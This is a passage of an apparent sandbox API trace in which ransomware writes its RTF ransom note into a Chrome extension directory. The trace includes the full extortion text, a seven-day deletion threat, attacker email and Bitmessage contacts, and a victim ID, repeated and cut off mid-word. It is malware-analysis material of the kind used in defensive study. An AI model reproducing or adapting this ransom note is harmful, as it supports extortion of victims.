t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.207] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.207] CloseHandle (hObject=0x2ec) returned 1 [0291.207] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0291.207] GetLastError () returned 0x2 [0291.207] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 